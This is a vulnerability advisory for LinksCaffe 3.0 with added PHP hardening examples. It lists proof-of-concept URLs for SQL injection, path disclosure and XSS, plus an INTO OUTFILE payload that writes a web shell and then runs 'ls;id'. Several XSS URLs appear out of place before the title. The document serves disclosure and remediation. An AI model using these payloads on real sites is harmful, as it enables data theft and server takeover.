http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]

http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]


Contact : simo64@gmail.com

greetz to all friends !
LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilities

Product : LinksCaffe 3.0
Website : http://gonafish.com/
Impact : manipulation of data / system access
Discovered by : Simo64 - Moroccan Security Team

[+] SQL injection
******************

[1] Vulnerable code at line 223 in links.php

code :

$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());

$offset and $limit are interpolated into the query without being sanitized, which allows SQL injection.

Exploit :

http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]
http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]

[2] Vulnerable code at line 516 in links.php

code :

if (!$newdays)
{
    $newdays=$daysnew;
}
else
{
    $newdays=$newdays;
}

$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());

$newdays comes straight from the request parameter and is interpolated into the query without being sanitized, which allows SQL injection.

Exploit :
http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]


[3] Vulnerable code at line 516 in links.php

code :

if ($action=="deadlink")
{
........
    $rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());
    while($row = mysql_fetch_array($rime)) {
        extract($row);
        echo "$link_desc";
    }

$link_id is interpolated into the query without being sanitized, which allows SQL injection.

Exploit :

http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]
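As an added example (not LinksCaffe's own code), here are the three queries from [1], [2] and [3] rewritten with mysqli prepared statements and strict integer validation. This is the fix for all three findings and also removes the injection point that the Remote Command Execution section below relies on. The example assumes an open mysqli connection in `$db` (with mysqlnd, so `get_result()` is available), the configured default `$daysnew` shown on the page, and that `cat_id` and `link_id` are integer columns; `clean_int` is a helper written here. Two further changes are deliberate: `extract($row)` is dropped, because it lets database contents overwrite any local variable, and query results are checked instead of being passed on blindly, so a failed query no longer triggers the "not a valid MySQL result resource" warnings that leak the install path in the Full Path Disclosure section (display_errors should be off in production regardless).

```php
<?php
// Added hardening example, not LinksCaffe code. Assumes: $db is an open
// mysqli connection (mysqlnd), $daysnew is the site's configured default.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw, never echo errors

/**
 * Return a non-negative integer from $src[$key], or $default. Anything that is
 * not purely digits (e.g. "-1 UNION SELECT ...") is rejected, and an upper
 * bound keeps page sizes sane.
 */
function clean_int(array $src, string $key, int $default, int $max = PHP_INT_MAX): int
{
    if (!isset($src[$key]) || !is_string($src[$key]) || !ctype_digit($src[$key])) {
        return $default;
    }
    return min((int) $src[$key], $max);
}

// [1] links.php listing: read from $_GET explicitly (no register_globals),
// then bind every value; LIMIT placeholders are allowed in prepared statements.
$cat    = clean_int($_GET, 'cat', 0);
$offset = clean_int($_GET, 'offset', 0);
$limit  = clean_int($_GET, 'limit', 20, 100);

$stmt = $db->prepare(
    "SELECT * FROM links WHERE link_val = 'yes' AND cat_id = ?
     ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT ?, ?"
);
$stmt->bind_param('iii', $cat, $offset, $limit);
$stmt->execute();
$links = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);

// [2] links.php?action=new: fall back to the configured $daysnew when the
// parameter is missing or not a plain integer.
$newdays = clean_int($_GET, 'newdays', (int) $daysnew);

$stmt = $db->prepare(
    "SELECT COUNT(*) FROM links
     WHERE (TO_DAYS(NOW()) - TO_DAYS(links.date)) <= ? AND link_val = 'yes'"
);
$stmt->bind_param('i', $newdays);
$stmt->execute();
$new_count = (int) $stmt->get_result()->fetch_row()[0];

// [3] links.php?action=deadlink: link_id is bound as an integer, the row is
// read into a named variable instead of extract(), and the description is
// HTML-escaped on output so stored data cannot inject markup either.
$link_id = clean_int($_GET, 'link_id', 0);

$stmt = $db->prepare("SELECT link_desc FROM links WHERE link_id = ?");
$stmt->bind_param('i', $link_id);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();
if ($row !== null) {
    echo htmlspecialchars($row['link_desc'], ENT_QUOTES, 'UTF-8');
}
```

Parameter binding fixes the injection itself; independently of it, the `INTO OUTFILE` write used in the command-execution section needs the MySQL `FILE` privilege and a server whose `secure_file_priv` does not restrict the target directory, so the application's database account should not hold `FILE` and the web tree should not be writable by the MySQL server process.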

[+] FullPath disclosure :

PoC :

http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*

Result :

Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540

Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549

Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554

[+] Remote Command Execution
*****************************

If magic_quotes_gpc is off, (3) can be used to write a PHP shell into a writable folder:

Exploit :

http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*

Commands can then be executed through it:

http://localhost/linkscaffe/pipo.php?cmd=ls;id



[+] Cross Site Scripting
*************************

$tablewidth in counter.php is not sanitized before being output, which allows XSS.
$newdays in links.php is not sanitized before being output, which allows XSS.
$tableborder, $menucolor, $textcolor and $bodycolor in links.php are not sanitized before being output, which allows XSS.

PoC :

http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]
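As an added example (not the project's code), here the layout parameters named in the XSS section are restricted to the values the templates can legitimately hold and HTML-escaped at the point of output. `param`, `clean_color`, `clean_size` and `h` are helpers written here, and the defaults and the markup printed are assumptions about the templates, not taken from LinksCaffe. The `'>` prefix in the PoCs works because the values land inside quoted HTML attributes; escaping with `ENT_QUOTES` keeps the value inside the attribute. The `$newdays` parameter is an integer and is covered by the integer validation in the SQL example above. Since the PoCs request menu.inc.php directly, that include file should also be unreachable from the web (kept outside the document root or blocked by the web server) instead of relying on the including script to set its variables.

```php
<?php
// Added hardening example, not LinksCaffe code. The PoC parameters end up
// inside HTML attributes, so each is (1) read explicitly from $_GET,
// (2) restricted to the shape the template expects and (3) escaped on output.

/** Return a request parameter as a string, or null if absent or not scalar
 *  (a ?name[]=x request would otherwise hand an array to the validators). */
function param(string $name): ?string
{
    $v = $_GET[$name] ?? null;
    return is_string($v) ? $v : null;
}

/** Accept a CSS colour of the form #rrggbb or a plain colour name; else the default. */
function clean_color(?string $v, string $default): string
{
    return ($v !== null && preg_match('/^(#[0-9a-fA-F]{6}|[a-zA-Z]{1,20})$/', $v))
        ? $v : $default;
}

/** Accept a small non-negative integer for widths and borders; else the default. */
function clean_size(?string $v, int $default, int $max = 2000): int
{
    return ($v !== null && ctype_digit($v) && (int) $v <= $max) ? (int) $v : $default;
}

/** Escape for use inside an HTML attribute or text node (both quote styles). */
function h(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
}

// Defaults are assumed site settings.
$tablewidth  = clean_size($_GET === [] ? null : param('tablewidth'), 500);
$tableborder = clean_size(param('tableborder'), 0, 20);
$menucolor   = clean_color(param('menucolor'), '#ffffff');
$textcolor   = clean_color(param('textcolor'), '#000000');
$bodycolor   = clean_color(param('bodycolor'), '#ffffff');

// The whitelist already rejects the PoC input; output escaping is kept as the
// second layer, so a value such as '>[XSS] would print as &#039;&gt;[XSS] and
// stay inside the attribute instead of closing it.
echo '<body bgcolor="' . h($bodycolor) . '" text="' . h($textcolor) . '">' . "\n";
echo '<table width="' . $tablewidth . '" border="' . $tableborder . '">' . "\n";
echo '<tr><td bgcolor="' . h($menucolor) . '">menu</td></tr></table>' . "\n";
echo "</body>\n";
```

Whitelisting and escaping are separate controls: the whitelist limits what a parameter can be, the escape makes whatever is printed inert in its HTML context, and the integer values are safe to print unescaped only because `clean_size` guarantees they are integers.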